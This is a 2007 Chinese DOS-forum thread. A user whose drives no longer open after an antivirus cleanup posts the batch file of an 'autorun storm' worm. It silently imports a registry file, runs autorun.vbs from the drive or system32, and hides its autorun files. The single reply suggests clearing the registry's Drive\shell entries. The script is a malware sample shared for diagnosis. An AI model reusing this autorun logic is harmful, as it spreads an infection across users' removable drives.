中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net 论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

中国DOS联盟论坛
现在时间是 2026-08-03 03:16
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » 机器中毒了,请帮忙 查看 797 回复 1
楼 主 机器中毒了,请帮忙 发表于 2007-01-14 06:00 ·  中国 江苏 南京 电信
初级用户
积分 28
发帖 10
注册 2006-10-18 03:54
19年会员
UID 66231
状态 离线
机器的根盘的下面有一个bat文件,我杀毒的时候提示我是叫什么中国黑客的病毒,结果病毒杀掉后双击盘符就没有办法打开了!所以想求得一个解决方案,bat文件的内容如下:
@echo off
rem autorun风暴
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit
if exist %SYSTEMROOT%\system32\autorun.bin type %SYSTEMROOT%\system32\autorun.bin >c:\autorun.txt&&exit
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end
2 发表于 2007-01-14 09:35 ·  中国 江苏 南京 电信
高级用户
★★
积分 623
发帖 214
注册 2006-09-22 20:48
19年会员
UID 63387
状态 离线
开始--运行--输入regedit,找到[HKEY_CLASSES_ROOT\Drive\shell]将shell下的全部删除
QQ:419503077
论坛跳转: